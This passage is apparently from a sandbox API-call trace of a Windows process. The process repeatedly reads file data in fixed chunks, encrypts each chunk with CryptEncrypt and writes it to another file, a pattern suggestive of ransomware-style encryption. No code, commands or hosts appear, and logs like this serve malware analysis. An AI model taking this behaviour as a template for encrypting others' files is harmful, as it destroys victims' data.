lpOverlapped=0x0) returned 1 [0242.153] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.153] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.153] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.153] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.154] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.154] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.154] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.154] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.154] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.155] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.155] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.155] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.155] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.155] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.155] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.156] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.156] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.156] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.156] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.156] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.156] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.156] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.157] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.157] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.157] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.157] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.157] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.157] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.158] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.158] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.158] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.158] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.158] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.158] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.158] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.158] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.158] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.159] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.159] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.159] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.159] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.159] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.159] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.160] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.160] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.160] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] CryptEncrypt (in: hKey=0x28bf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.160] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.160] CryptEncrypt (in: 